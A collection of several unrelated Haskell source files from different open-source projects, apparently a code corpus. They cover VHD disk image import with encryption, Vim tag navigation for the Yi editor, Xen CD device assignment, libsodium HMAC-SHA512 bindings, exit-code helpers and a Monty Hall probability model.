dq x = replace "%20" " " x
mkKeyPath "" = Nothing
mkKeyPath p = Just p
writeDIM :: FilePath -> DIM -> IO ()
writeDIM path = writeFile path . unlines . map serialiseDIMEntry
readDIM :: FilePath -> IO DIM
readDIM path = catMaybes . map deserialiseDIMEntry . lines <$> readFile path
systems app = contentVirtualSystems $ appContent app
getImportedDiskImage :: Disk -> DIM -> Maybe ImportedDiskImage
getImportedDiskImage d dim = safeHead . map snd $ (filter match1 dim ++ filter match2 dim) where
imageID d = diID `fmap` diskImage d
imageMatches d imgid =
case imageID d of
Nothing -> False
Just iid -> iid == imgid
match1 (Just diskid, idi) = diskid == diskID d && imageMatches d (idiID idi)
match1 _ = False
match2 (_, idi) = imageMatches d (idiID idi)
safeHead (h:_) = Just h
safeHead _ = Nothing
getDiskImportedPhysPath :: Disk -> DIM -> Maybe FilePath
getDiskImportedPhysPath d dim = idiPhysPath' <$> getImportedDiskImage d dim
getDiskImportedKeyPath :: Disk -> DIM -> Maybe FilePath
getDiskImportedKeyPath d dim = join (idiKeyPath' <$> getImportedDiskImage d dim)
sharedDiskImages :: [VirtualSystem] -> [DiskImage]
sharedDiskImages systems = nubBy (\a b -> diID a == diID b) . filter diShared $ vsImages where
vsImages = concatMap vsImages' systems
vsImages' = catMaybes . map diskImage . vsDisks where
instancedDiskImages :: [VirtualSystem] -> [(DiskID, DiskImage)]
instancedDiskImages systems = filter (not . diShared . snd) $ vsImages where
vsImages = concatMap vsImages' systems
vsImages' = catMaybes . map f . vsDisks where
f disk = case diskImage disk of
Just img -> Just (diskID disk, img)
_ -> Nothing
importDiskImages :: App -> Import DIM
importDiskImages app = do
let shared = sharedDiskImages $ systems app
instanced = instancedDiskImages $ systems app
shared_ <- zip (repeat Nothing) <$> mapM (importDiskImage (appID app)) shared
instanced_ <- mapM importInstance instanced
return (shared_ ++ instanced_)
where
importInstance (diskid, img) = do
idi <- importDiskImage (appID app) img
return (Just diskid, idi)
importDiskImage :: AppID -> DiskImage -> Import ImportedDiskImage
importDiskImage appid im = case diType im of
VHD -> importDiskImageVHD appid im
ISO -> importISO im
RawFilesystem -> importRawFilesystem appid im
CPIO -> importCPIO appid im
importISO :: DiskImage -> Import ImportedDiskImage
importISO img = ImportedDiskImage <$> pure (diID img) <*> imp where
imp = case diFile img of
Nothing -> return $ IDIData "/storage/null.iso" Nothing
Just fr -> IDIData <$> importISOFile fr <*> pure Nothing
inform m = liftIO (hPutStrLn stderr m)
untemp :: IDIData -> Import IDIData
untemp (IDIData vhd (Just key)) = IDIData <$> untempFileName vhd <*> (Just <$> untempFileName key)
untemp (IDIData vhd Nothing) = IDIData <$> untempFileName vhd <*> pure Nothing
importRawFilesystem :: AppID -> DiskImage -> Import ImportedDiskImage
importRawFilesystem appid img = ImportedDiskImage <$> pure (diID img) <*> imp where
imp = do
name <- nameVhdFor appid img
case diFile img of
Nothing -> throwError $ FilesystemImageFileNotSpecified (show $ diID img)
Just fr -> do
vhd <- createVhd name (fromIntegral capacityMBs)
key <- setupEncryption vhd (diEncryption img)
removeFileOnError vhd $ do
src <- fileSrcPath <$> fileSourceFromR fr
inform $ printf "copying filesystem image %s -> %s" (show fr) name
withCryptoVhdTap vhd $ \dev -> do
ddFile src dev
sync
untemp (IDIData vhd key)
-- rounded to upper bound
capacityMBs = round $ diCapacity img `divMod` (1024*1024) where round (x,y) = x + signum y
importDiskImageVHD :: AppID -> DiskImage -> Import ImportedDiskImage
importDiskImageVHD appid img = ImportedDiskImage <$> pure (diID img) <*> imp where
imp :: Import IDIData
imp = do
name <- nameVhdFor appid img
case diFile img of
Nothing -> do
vhd <- createVhd name (fromIntegral capacityMBs)
key <- setupEncryption vhd (diEncryption img)
untemp (IDIData vhd key)
Just fr -> do
vhd <- tempFileName =<< importVHDFile name fr
key <- setupEncryption vhd (diEncryption img)
untemp (IDIData vhd key)
-- rounded to upper bound
capacityMBs = round $ diCapacity img `divMod` (1024*1024) where round (x,y) = x + signum y
importCPIO :: AppID -> DiskImage -> Import ImportedDiskImage
importCPIO appid img = ImportedDiskImage <$> pure (diID img) <*> imp where
imp = do
name <- nameVhdFor appid img
case diFile img of
Nothing -> throwError $ CPIOImageFileNotSpecified (show $ diID img)
Just fr -> do
src <- fileSourceFromR fr
-- create vhd, make filesystem on it, extract cpio archive
vhd <- createVhd name (fromIntegral capacityMBs)
key <- setupEncryption vhd (diEncryption img)
removeFileOnError vhd $ do
withCryptoVhdTap vhd $ \dev -> do
mkfs (fromMaybe Ext3 (diFilesystem img)) dev
withMountedDev dev $ \dst -> extractAppCpio src dst >> sync
untemp (IDIData vhd key)
-- rounded to upper bound
capacityMBs = round $ diCapacity img `divMod` (1024*1024) where round (x,y) = x + signum y
-- figure out basename for vhd image, possibly appending instance uuid if not shared
nameVhdFor :: AppID -> DiskImage -> Import String
nameVhdFor (AppID appid appver) img = do
instanceID <- if diShared img then pure Nothing else Just . show <$> liftIO uuidGen
return (diskname instanceID)
where
diskname instanceID = appid ++ "-" ++ imgid ++ instid ++ ".vhd" where
DiskImageID imgid = diID img
instid = case instanceID of
Nothing -> ""
Just s -> '-':s
createVhd :: FilePath -> Int -> Import FilePath
createVhd filename sizeMB = do
path <- tempFileName =<< ((</> filename) <$> diskFolder)
addImportFile path
inform ("creating VHD " ++ path ++ " capacity=" ++ show sizeMB ++ " MB")
liftIO $ createDirectoryIfMissing True (takeDirectory path)
_ <- liftIO $ readProcessOrDie "vhd-util" ["create", "-s", show sizeMB, "-n", path] ""
return path
allocatedBlockCount :: FilePath -> IO Int
allocatedBlockCount vhd = do
countStr <- liftIO $ readProcessOrDie "vhd-util" ["query", "-a", "-n", vhd] ""
return $ fromMaybe 0 $ maybeRead countStr
setupEncryption :: FilePath -> DiskEncryption -> Import (Maybe FilePath)
setupEncryption vhd e = case e of
NoEncryption -> return Nothing
(GenerateCryptoKey bits) -> do
key <- createKeyFile bits vhd
-- set the key on vhd
blocks <- liftIO $ allocatedBlockCount vhd
when (blocks == 0) $
void $ liftIO $ readProcessOrDie "vhd-util" ["key", "-s", "-n", vhd, "-k", key] ""
return (Just key)
(UseCryptoKey fileRes) -> do
key <- tempFileName =<< importEncryptionKeyFile vhd fileRes
-- set the key on vhd
blocks <- liftIO $ allocatedBlockCount vhd
when (blocks == 0) $
void $ liftIO $ readProcessOrDie "vhd-util" ["key", "-s", "-n", vhd, "-k", key] ""
return (Just key)
where
valid_keysizes = [ 256, 512 ]
keyPath vhd bits = do
dir <- cryptoKeysFolder
return $ dir </> encryptionKeyFileName vhd bits
copy s d n = liftIO (BL.readFile s >>= return . BL.take n >>= BL.writeFile d)
createKeyFile bits vhd = do
inform $ "... generating encryption key of size " ++ show bits ++ ", please move mouse to fill system entropy buffer faster"
let src = "/dev/random"
dst <- tempFileName =<< keyPath vhd bits
addImportFile dst
copy src dst (fromIntegral $ bits `div` 8) >> return dst
return dst
tapCreate ty extraEnv path = do
exist <- doesFileExist path
when (not exist) $ error ("file " ++ show path ++ "does not exist")
chomp <$> readProcessOrDieWithEnv extraEnv "tap-ctl" ["create", "-a", ty++":"++path] ""
tapCreateVhd = tapCreate "vhd"
tapDestroy dev = void $ readProcessOrDie "tap-ctl" ["destroy","-d",dev] ""
finally' = flip E.finally
withCryptoVhdTap :: FilePath -> (FilePath -> IO a) -> Import a
withCryptoVhdTap vhdfile action = do
keys <- tempFileName =<< cryptoKeysFolder
liftIO $ withVhdTap [("TAPDISK2_CRYPTO_KEYDIR", keys)] vhdfile action
withVhdTap :: [(String,String)] -> FilePath -> (FilePath -> IO a) -> IO a
withVhdTap extraenv vhdfile action = E.bracket (tapCreateVhd extraenv vhdfile) tapDestroy action
sync = void $ readProcessOrDie "sync" [] ""
mkfs :: FilesystemType -> FilePath -> IO ()
mkfs fs dev = do
let (cmd,args) | fs == Swap = ( "mkswap", [dev])
| otherwise = (("mkfs." ++ filesystemStr fs), [dev])
inform (cmd ++ " " ++ intercalate " " args)
void $ readProcessOrDie cmd args ""
when (fs `elem` [Ext2, Ext3, Ext4]) $ tunefs dev
where tunefs dev = void $ readProcessOrDie "tune2fs" ["-i", "0", "-c", "-1", "-m", "0", dev] ""
mount :: FilePath -> FilePath -> IO ()
mount dev dir = void $ readProcessOrDie "mount" [dev, dir] ""
umount :: FilePath -> IO ()
umount dir = void $ readProcessOrDie "umount" [dir] ""
withMountedDev :: FilePath -> (FilePath -> IO a) -> IO a
withMountedDev dev action =
withTempDirectory $ \tempdir -> do
mount dev tempdir
action tempdir `E.finally` umount tempdir
removeFileOnError :: FilePath -> Import a -> Import a
removeFileOnError file f =
f `catchError` (\err -> liftIO (removeFile file) >> throwError err)
| jean-edouard/manager | apptool/Import/Images.hs | gpl-2.0 | 12,543 | 0 | 25 | 2,917 | 4,045 | 2,016 | 2,029 | 256 | 5 |
{-# LANGUAGE CPP #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE FlexibleContexts #-}
{-# LANGUAGE LambdaCase #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE TemplateHaskell #-}
{-# OPTIONS_HADDOCK show-extensions #-}
-- |
-- Module : Yi.Keymap.Vim.Tag
-- License : GPL-2
-- Maintainer : yi-devel@googlegroups.com
-- Stability : experimental
-- Portability : portable
module Yi.Keymap.Vim.Tag
( completeVimTag
, gotoTag
, nextTag
, popTag
, unpopTag
) where
import GHC.Generics (Generic)
import Control.Applicative ((<$>))
import Control.Lens (view)
import Control.Monad (foldM, void)
import Data.Binary (Binary (..))
import Data.Default (Default (..))
import Data.Maybe (maybeToList)
import Data.Monoid ((<>))
import qualified Data.Text as T (Text)
import Data.Typeable (Typeable)
import System.Directory (doesFileExist)
import System.FilePath (takeDirectory, (</>))
import System.FriendlyPath (userToCanonPath)
import Yi.Buffer
import Yi.Core (errorEditor)
import Yi.Editor
import Yi.File (openingNewFile)
import Yi.Keymap (YiM)
import Yi.Tag
import Yi.Types (YiVariable)
import Yi.Utils (io)
-- | List of tags and the file/line/char that they originate from.
-- (the location that :tag or Ctrl-[ was called from).
data VimTagStack = VimTagStack
{ tagStackList :: [(Tag, Int, FilePath, Int, Int)]
, tagStackIndex :: Int
} deriving (Typeable, Generic)
instance Default VimTagStack where
def = VimTagStack [] 0
instance YiVariable VimTagStack
instance Binary VimTagStack
-- | Returns tag, tag index, filepath, line number, char number
getTagList :: EditorM [(Tag, Int, FilePath, Int, Int)]
getTagList = do
VimTagStack ts _ <- getEditorDyn
return ts
getTagIndex :: EditorM Int
getTagIndex = do
VimTagStack _ ti <- getEditorDyn
return ti
setTagList :: [(Tag, Int, FilePath, Int, Int)] -> EditorM ()
setTagList tl = do
t@(VimTagStack _ _) <- getEditorDyn
putEditorDyn $ t { tagStackList = tl }
setTagIndex :: Int -> EditorM ()
setTagIndex ti = do
t@(VimTagStack _ _) <- getEditorDyn
putEditorDyn $ t { tagStackIndex = ti }
-- | Push tag at index.
pushTagStack :: Tag -> Int -> FilePath -> Int -> Int -> EditorM ()
pushTagStack tag ind fp ln cn = do
tl <- getTagList
ti <- getTagIndex
setTagList $ (take ti tl) ++ [(tag, ind, fp, ln, cn)]
setTagIndex $ ti + 1
-- | Get tag and decrement index (so that when a new push is done, the current
-- tag is popped)
popTagStack :: EditorM (Maybe (Tag, Int, FilePath, Int, Int))
popTagStack = do
tl <- getTagList
ti <- getTagIndex
case tl of
[] -> return Nothing
_ -> case ti of
0 -> return Nothing
_ -> setTagIndex (ti - 1) >> return (Just $ tl !! (ti - 1))
-- | Opens the file that contains @tag@. Uses the global tag table or uses
-- the first valid tag file in @TagsFileList@.
gotoTag :: Tag -> Int -> Maybe (FilePath, Int, Int) -> YiM ()
gotoTag tag ind ret =
void . visitTagTable $ \tagTable -> do
let lis = lookupTag tag tagTable
if (length lis) <= ind
then errorEditor $ "tag not found: " <> _unTag tag
else do
bufinf <- withCurrentBuffer bufInfoB
let (filename, line) = lis !! ind
(fn, ln, cn) = case ret of
Just ret' -> ret'
Nothing -> (bufInfoFileName bufinf,
bufInfoLineNo bufinf,
bufInfoColNo bufinf)
withEditor $ pushTagStack tag ind fn ln cn
openingNewFile filename $ gotoLn line
-- | Goes to the next tag. (:tnext)
nextTag :: YiM ()
nextTag = do
prev <- withEditor popTagStack
case prev of
Nothing -> errorEditor $ "tag stack empty"
Just (tag, ind, fn, ln, cn) -> gotoTag tag (ind + 1) (Just (fn, ln, cn))
-- | Return to location from before last tag jump.
popTag :: YiM ()
popTag = do
tl <- withEditor getTagList
case tl of
[] -> errorEditor "tag stack empty"
_ -> do
posloc <- withEditor popTagStack
case posloc of
Nothing -> errorEditor "at bottom of tag stack"
Just (_, _, fn, ln, cn) -> openingNewFile fn $ moveToLineColB ln cn
-- | Go to next tag in the tag stack. Represents :tag without any
-- specified tag.
unpopTag :: YiM ()
unpopTag = do
tl <- withEditor getTagList
ti <- withEditor getTagIndex
if ti >= length tl
then case tl of
[] -> errorEditor "tag stack empty"
_ -> errorEditor "at top of tag stack"
else let (tag, ind, _, _, _) = tl !! ti
in void . visitTagTable $ \tagTable -> do
let lis = lookupTag tag tagTable
if (length lis) <= ind
then errorEditor $ "tag not found: " <> _unTag tag
else do
bufinf <- withCurrentBuffer bufInfoB
let (filename, line) = lis !! ind
ln = bufInfoLineNo bufinf
cn = bufInfoColNo bufinf
fn = bufInfoFileName bufinf
tl' = take ti tl
++ (tag, ind, fn, ln, cn):(drop (ti + 1) tl)
withEditor $ setTagList tl'
openingNewFile filename $ gotoLn line
completeVimTag :: T.Text -> YiM [T.Text]
completeVimTag s =
fmap maybeToList . visitTagTable $ return . flip completeTag s
-- | Gets the first valid tags file in @TagsFileList@, if such a valid
-- file exists.
tagsFile :: YiM (Maybe FilePath)
tagsFile = do
fs <- view tagsFileList <$> askCfg
let g f' f = do
case f' of
Just _ -> return f'
Nothing -> tagsFileLocation f
foldM g Nothing fs
-- | Handles paths of the form ./[path], which represents a tags file relative
-- to the path of the current directory of a file rather than the directory
-- of the process.
tagsFileLocation :: String -> YiM (Maybe FilePath)
tagsFileLocation s
| length s < 2 || take 2 s /= "./" = check s
| otherwise = do
let s' = drop 2 s
dir <- takeDirectory <$>
(withCurrentBuffer $ bufInfoB >>= return . bufInfoFileName)
check $ dir </> s'
where check f = do
f' <- io $ userToCanonPath f
fileExists <- io $ doesFileExist f'
if fileExists
then return $ Just f'
else return Nothing
-- | Call continuation @act@ with the TagTable. Uses the global table
-- or, if it doesn't exist, uses the first valid tag file in
-- @TagsFileList@.
visitTagTable :: (TagTable -> YiM a) -> YiM (Maybe a)
visitTagTable act = do
posTagTable <- withEditor getTags
case posTagTable of
Just tagTable -> Just <$> act tagTable
Nothing -> do
f <- tagsFile
case f of
Nothing -> errorEditor "No tags file" >> return Nothing
Just f' -> do
tagTable <- io $ importTagTable f'
withEditor $ setTags tagTable
Just <$> act tagTable
| TOSPIO/yi | src/library/Yi/Keymap/Vim/Tag.hs | gpl-2.0 | 7,521 | 0 | 24 | 2,507 | 1,973 | 1,022 | 951 | -1 | -1 |
{-# LANGUAGE CPP #-}
module HsColour(hsColourHTML, hsColourConsole) where
#ifdef GPL_SCARES_ME
hsColourConsole :: IO (String -> String)
hsColourConsole = return id
hsColourHTML :: String -> String
hsColourHTML = id
#else
import Language.Haskell.HsColour.TTY as TTY
import Language.Haskell.HsColour.Colourise
import Language.Haskell.HsColour.CSS as CSS
hsColourConsole :: IO (String -> String)
hsColourConsole = do
prefs <- readColourPrefs
return $ TTY.hscolour prefs
hsColourHTML :: String -> String
hsColourHTML = CSS.hscolour False 1
#endif
| mpickering/hlint | src/HsColour.hs | bsd-3-clause | 560 | 0 | 7 | 83 | 53 | 32 | 21 | 11 | 1 |
--
-- Copyright (c) 2014 Citrix Systems, Inc.
--
-- This program is free software; you can redistribute it and/or modify
-- it under the terms of the GNU General Public License as published by
-- the Free Software Foundation; either version 2 of the License, or
-- (at your option) any later version.
--
-- This program is distributed in the hope that it will be useful,
-- but WITHOUT ANY WARRANTY; without even the implied warranty of
-- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- GNU General Public License for more details.
--
-- You should have received a copy of the GNU General Public License
-- along with this program; if not, write to the Free Software
-- Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
--
{-# LANGUAGE ScopedTypeVariables #-}
module XenMgr.CdLock
(
getCdDeviceVms
, getCdDeviceStickyVm
, getVmStickyCdDevices
, assignCdDevice
, assignStickyCdDevice
, unassignCdDevice
, unassignStickyCdDevice
, ejectCdDevice
, notifyCdDeviceAssignmentChanged
, updateCdDeviceMediaStatusKey
) where
import Data.Maybe
import Data.String
import Control.Applicative
import Control.Monad
import qualified Control.Exception as E
import Text.Printf
import System.Timeout
import System.IO.Unsafe
import System.FilePath
import Vm.Types
import Vm.DomainCore
import Vm.Queries
import XenMgr.Rpc
import XenMgr.Host
import Tools.XenStore
import Tools.Db
import Tools.Log
import Tools.Misc
import Tools.File
import Tools.Process
import System.Directory
import Control.Concurrent
import Rpc.Autogen.XenmgrNotify
import XenMgr.Notify
import XenMgr.Expose.ObjectPaths
import Data.Map (Map)
import qualified Data.Map as Map
requestTimeout = 5
-- cd assignment
xsWaitForNodeToDisappear :: Int -> String -> IO Bool
xsWaitForNodeToDisappear timeout_secs node = do
r <- timeout (10^6 * timeout_secs) $ xsWaitFor node test
case r of
Just () -> return True
Nothing -> return False
where
test = isNothing <$> xsRead node
cdDeviceXsNode :: DomainID -> BSGDevice -> String
cdDeviceXsNode domid (BSGDevice a b c d) =
printf "/local/domain/%d/bsgdev/%s" domid (printf "%d_%d_%d_%d" a b c d :: String)
cdDeviceXsReqNode :: DomainID -> BSGDevice -> String
cdDeviceXsReqNode domid (BSGDevice a b c d) =
printf "/local/domain/%d/bsgdev-req/%s" domid (printf "%d_%d_%d_%d" a b c d :: String)
cdDeviceStickyNode :: BSGDevice -> String
cdDeviceStickyNode (BSGDevice a b c d) =
printf "/xenmgr/cdassign/%s" (printf "%d_%d_%d_%d" a b c d :: String)
getCdDeviceLockStatus :: DomainID -> BSGDevice -> IO Bool
getCdDeviceLockStatus domid dev = from <$> xsRead (cdDeviceXsNode domid dev ++ "/lock") where
from (Just "1") = True
from _ = False
getCdDeviceMediaStatus :: BSGDevice -> IO Bool
getCdDeviceMediaStatus dev =
fromBdev =<< findBlockDevice dev where
fromBdev Nothing = return False
fromBdev (Just bdev) =
(parse <$> readProcessOrDie "/lib/udev/cdrom_id" [bdev] "")
`E.catch` (\(_ :: E.SomeException) -> return False)
parse = ("ID_CDROM_MEDIA=1" `elem`) . lines
updateCdDeviceMediaStatusKey :: BSGDevice -> IO ()
updateCdDeviceMediaStatusKey dev =
update (key dev) =<< (strstate <$> getCdDeviceMediaStatus dev) where
key (BSGDevice a b c d) = printf "/xenclient/bsgdev/%d_%d_%d_%d/media" a b c d
strstate True = "1"
strstate _ = "0"
update path v = do
v' <- xsRead path
when (Just v /= v') $ xsWrite path v
getCdDeviceDomains :: BSGDevice -> Rpc [DomainID]
getCdDeviceDomains dev = filterM lockedBy =<< getDomains where
getDomains = catMaybes <$> (mapM getDomainID =<< getVms)
lockedBy domid = liftIO $ getCdDeviceLockStatus domid dev
-- return (vm uuid, sticky bit) tuples
getCdDeviceVms :: BSGDevice -> Rpc [(Uuid,Bool)]
getCdDeviceVms dev = do
running <- catMaybes <$> (mapM getDomainUuid =<< getCdDeviceDomains dev)
stickies <- getVmsBy (isStickyTo dev)
return $ map (\vm -> (vm, vm `elem` stickies)) (running ++ stickies)
unassignCdDevice' :: BSGDevice -> DomainID -> IO ()
unassignCdDevice' dev domid = do
assigned <- getCdDeviceLockStatus domid dev
when assigned $ do
let ejectnode = cdDeviceXsReqNode domid dev ++ "/req-eject"
xsWrite ejectnode "1"
r <- xsWaitForNodeToDisappear requestTimeout ejectnode
when (not r) $ error "unassign failed"
unassignCdDevice :: BSGDevice -> Rpc ()
unassignCdDevice dev = mapM_ (liftIO . unassignCdDevice' dev) =<< getCdDeviceDomains dev
assignCdDevice :: BSGDevice -> Uuid -> Rpc ()
assignCdDevice dev@(BSGDevice a b c d) uuid = withDomain =<< getDomainID uuid where
withDomain Nothing = return ()
withDomain (Just domid) = liftIO $ do
assigned <- getCdDeviceLockStatus domid dev
when (not assigned) $ do
info $ "assigning CD device " ++ (printf "%d:%d:%d:%d" a b c d) ++ " to vm " ++ show uuid
let assignnode = cdDeviceXsReqNode domid dev ++ "/req-assign"
xsWrite assignnode "1"
r <- xsWaitForNodeToDisappear requestTimeout assignnode
when (not r) $ error "assign of CD device failed"
unassignStickyCdDevice :: BSGDevice -> Rpc ()
unassignStickyCdDevice dev = do
dbRm (cdDeviceStickyNode dev)
unassignCdDevice dev
assignStickyCdDevice :: BSGDevice -> Uuid -> Rpc ()
assignStickyCdDevice dev uuid = do
unassignCdDevice dev
dbWrite (cdDeviceStickyNode dev) uuid
withDomain =<< getDomainID uuid
where
withDomain (Just domid) = assignCdDevice dev uuid
withDomain _ = return ()
getCdDeviceStickyVm :: BSGDevice -> Rpc (Maybe Uuid)
getCdDeviceStickyVm dev = do
vm' <- dbRead (cdDeviceStickyNode dev)
case vm' of
"" -> return Nothing
uuidStr -> return $ Just (fromString uuidStr)
isStickyTo :: BSGDevice -> Uuid -> Rpc Bool
isStickyTo dev vm = (== Just vm) <$> getCdDeviceStickyVm dev
getVmStickyCdDevices :: Uuid -> Rpc [BSGDevice]
getVmStickyCdDevices uuid = filterM (\d -> isStickyTo d uuid) =<< liftIO getHostBSGDevices
ejectCdDevice :: BSGDevice -> IO ()
ejectCdDevice dev = ej =<< findBlockDevice dev where
ej Nothing = return ()
ej (Just block) = do
info $ "ejecting " ++ block
void $ readProcessOrDie "eject" [block] []
findBlockDevice :: BSGDevice -> IO (Maybe FilePath)
findBlockDevice scsi =
get <$> (filterM test =<< list "/sys/class/block") where
list path = map (path </>) <$> getDirectoryContents_nonDotted path
test path = doesDirectoryExist (path </> "device" </> "scsi_device" </> fname scsi)
fname (BSGDevice a b c d) = printf "%d:%d:%d:%d" a b c d
get [] = Nothing
get (x:_) = Just ("/dev" </> takeBaseName x)
cdAssignChangedTasks :: MVar (Map BSGDevice ScheduledTask)
{-# NOINLINE cdAssignChangedTasks #-}
cdAssignChangedTasks = unsafePerformIO (newMVar Map.empty)
notifyCdDeviceAssignmentChanged :: (MonadRpc e m) => BSGDevice -> m ()
notifyCdDeviceAssignmentChanged dev = do
updateKeyedNotifyTask 1.0 dev cdAssignChangedTasks $ do
action =<< getCdDeviceVms dev
where
action [] =
notifyComCitrixXenclientXenmgrCdAssignmentChanged xenmgrObjectPath (bsgDeviceIdStr dev) "" (fromString "/")
action ((vm,sticky):_) = do
-- update media state on lock transference
liftIO $ updateCdDeviceMediaStatusKey dev
-- dbus signal
notifyComCitrixXenclientXenmgrCdAssignmentChanged xenmgrObjectPath (bsgDeviceIdStr dev) (show vm) (vmObjPath vm)
| jean-edouard/manager | xenmgr/XenMgr/CdLock.hs | gpl-2.0 | 7,416 | 0 | 17 | 1,400 | 2,066 | 1,040 | 1,026 | 155 | 2 |
module RecordIn2 where
data S = S1 { x :: Int } | S2 { x :: Int } deriving Show
{- map2 xs = map (\y -> S1 {x = 1}) xs -}
map2 xs = (case ((\ y -> S1 {x = 1}), xs, 1) of
(f, [], n) -> []
(f, (x : xs), n) -> (f x) : (map2 xs)) | kmate/HaRe | old/testing/generativeFold/RecordIn2_TokOut.hs | bsd-3-clause | 259 | 0 | 11 | 97 | 131 | 78 | 53 | 5 | 2 |
module Main where
import Foo
import System.Exit
main :: IO ()
main | fooTest [] = exitSuccess
| otherwise = exitFailure
| tolysz/prepare-ghcjs | spec-lts8/cabal/Cabal/tests/PackageTests/BenchmarkExeV10/benchmarks/bench-Foo.hs | bsd-3-clause | 127 | 0 | 9 | 28 | 47 | 24 | 23 | 6 | 1 |
{-# OPTIONS_GHC -fno-warn-missing-signatures #-}
{-# LANGUAGE RecordWildCards #-}
{- |
See the documentation in "Crypto.Sodium.Auth".
-}
module Crypto.Sodium.Auth.HmacSha512
( -- * Constants
keyBytes -- | Number of bytes in an authentication 'Key'.
, tagBytes -- | Number of bytes in an authentication 'Tag'.
-- * Types
, Key -- | Authentication 'Key'
, mkKey -- | Smart constructor for 'Key'. Verifies that the length of the
-- parameter is 'keyBytes'.
, unKey -- | Returns the contents of a 'Key'
, Tag -- | Authentication 'Tag'
, mkTag -- | Smart constructor for 'Tag'. Verifies thta the length of the
-- parameter is 'tagBytes'
, unTag -- | Returns the contents of a 'Tag'
-- * Key Generation
, randomKey -- | Randomly generates a 'Key' for authentication.
-- * Authentication/Verification
, authenticate -- | Authenticates a message using a secret 'Key'
, verify -- | Returns 'True' if 'Tag' is a correct authenticator
-- of a message under a secret 'Key'. Otherwise it returns 'False'.
, hmacSha512
) where
import qualified Crypto.Sodium.Auth.Internal as A
import Foreign.C.Types (CInt (..), CULLong (..))
foreign import ccall unsafe "crypto_auth_hmacsha512_bytes"
c_crypto_auth_hmacsha512_bytes :: CInt
foreign import ccall unsafe "crypto_auth_hmacsha512_keybytes"
c_crypto_auth_hmacsha512_keybytes :: CInt
foreign import ccall unsafe "crypto_auth_hmacsha512"
c_crypto_auth_hmacsha512 :: A.AuthFn
foreign import ccall unsafe "crypto_auth_hmacsha512_verify"
c_crypto_auth_hmacsha512_verify :: A.VerifyFn
data HmacSha512
type Key = A.Key HmacSha512
type Tag = A.Tag HmacSha512
hmacSha512 :: A.Auth HmacSha512
hmacSha512 = A.mkAuth c_crypto_auth_hmacsha512_keybytes c_crypto_auth_hmacsha512_bytes
c_crypto_auth_hmacsha512 c_crypto_auth_hmacsha512_verify
A.Auth {..} = hmacSha512
| dnaq/crypto-sodium | src/Crypto/Sodium/Auth/HmacSha512.hs | mit | 2,028 | 0 | 6 | 485 | 224 | 143 | 81 | -1 | -1 |
{- |
Description : standard process exit codes
Copyright : (c) Martyn J. Pearce 2014, 2015
License : BSD
Maintainer : haskell@sixears.com
standard process exit codes
-}
module Fluffy.Sys.Exit
( Die
, die, dieInternal, dieParse, exit, exExit
, eUsage, eUtility
, exitAbnormal, exitIORead, exitUsage, exitUtility
, handleDie
)
where
-- base --------------------------------
import Data.Word ( Word8 )
import Control.Exception ( Exception )
import System.Exit ( ExitCode( ExitFailure )
, exitSuccess, exitWith
)
-- exceptions --------------------------
import Control.Monad.Catch ( MonadThrow, handle, throwM )
-- Fluffy ------------------------------
import Fluffy.Sys.IO ( warn )
--------------------------------------------------------------------------------
-- exit --------------------------------
-- | akin to C's exit(int); exit process with a given value
exit :: Word8 -> IO a
exit 0 = exitSuccess
exit e = exitWith . ExitFailure . fromEnum $ e
-- exitAbnormal ------------------------
-- | exit; all worked, but got an unusual conclusion (e.g., grep found nothing)
exitAbnormal :: IO a
exitAbnormal = exit 1
-- exitUtility -------------------------
-- | exit; because a utility function (e.g., --help) was invoked
eUtility :: Word8
eUtility = 3
exitUtility :: IO a
exitUtility = exit eUtility
-- exitUsage ---------------------------
-- | exit; due to a user error invoking the program
eUsage :: Word8
eUsage = 2
exitUsage :: IO a
exitUsage = exit eUsage
-- exitIORead --------------------------
-- | exit; due to an IO read failure
exitIORead :: IO a
exitIORead = exit 4
-- exitParse ---------------------------
-- | exit; due to a parse failure
eParse :: Word8
eParse = 5
-- exitInternal ------------------------
eInternal :: Word8
eInternal = 254
-- Die -------------------------------------------------------------------------
data Die = Die Word8 String
instance Show Die where
show (Die _ s) = s
instance Exception Die
-- die ---------------------------------
die :: MonadThrow m => Word8 -> String -> m a
die i s = throwM (Die i s)
dieParse :: MonadThrow m => String -> m a
dieParse = die eParse
dieInternal :: MonadThrow m => String -> m a
dieInternal = die eInternal
-- handleDie ---------------------------
-- | place this at the head of main to exit from Die throws, e.g.,
--
-- > main = handleDie $ do
-- > ...
handleDie :: IO () -> IO ()
handleDie = handle h
where h (Die i s) = exExit i s
-- exExit ------------------------------
-- | exit with an error message and a defined exit code
exExit :: Word8 -> String -> IO a
exExit i s = warn s >> exit i
| sixears/fluffy | src/Fluffy/Sys/Exit.hs | mit | 2,715 | 0 | 9 | 548 | 513 | 287 | 226 | 46 | 1 |
module MontyHall where
import Probability hiding (choose)
--import ListUtils (replicate)
import List ( (\\) )
import Monad (liftM)
data Door = A | B | C
deriving (Eq,Ord,Show)
doors :: [Door]
doors = [A,B,C]
data State = Doors {prize :: Door, chosen :: Door, opened :: Door}
deriving (Eq,Ord,Show)
-- initial configuration of the game status
--
start :: State
start = Doors {prize=u,chosen=u,opened=u} where u=undefined
-- Steps of the game:
--
-- (1) hide the prize
-- (2) choose a door
-- (3) open a non-open door, not revealing the prize
-- (4) apply strategy: switch or stay
--
hide :: Trans State
hide s = uniform [s {prize = d} | d <- doors]
choose :: Trans State
choose s = uniform [s {chosen = d} | d <- doors]
open :: Trans State
open s = uniform [s {opened = d} | d <- doors \\ [prize s,chosen s]]
type Strategy = Trans State
switch :: Strategy
switch s = uniform [s {chosen = d} | d <- doors \\ [chosen s,opened s]]
stay :: Strategy
stay = idT
game :: Strategy -> Trans State
game s = sequ [hide,choose,open,s]
-- Playing the game
--
data Outcome = Win | Lose
deriving (Eq,Ord,Show)
result :: State -> Outcome
result s = if chosen s==prize s then Win else Lose
eval :: Strategy -> Dist Outcome
eval s = mapD result (game s start)
simEval :: Int -> Strategy -> RDist Outcome
simEval k s = mapD result `fmap` (k ~. game s) start
-- Alternative modeling
--
firstChoice :: Dist Outcome
firstChoice = uniform [Win,Lose,Lose]
switch' :: Trans Outcome
switch' Win = certainly Lose
switch' Lose = certainly Win
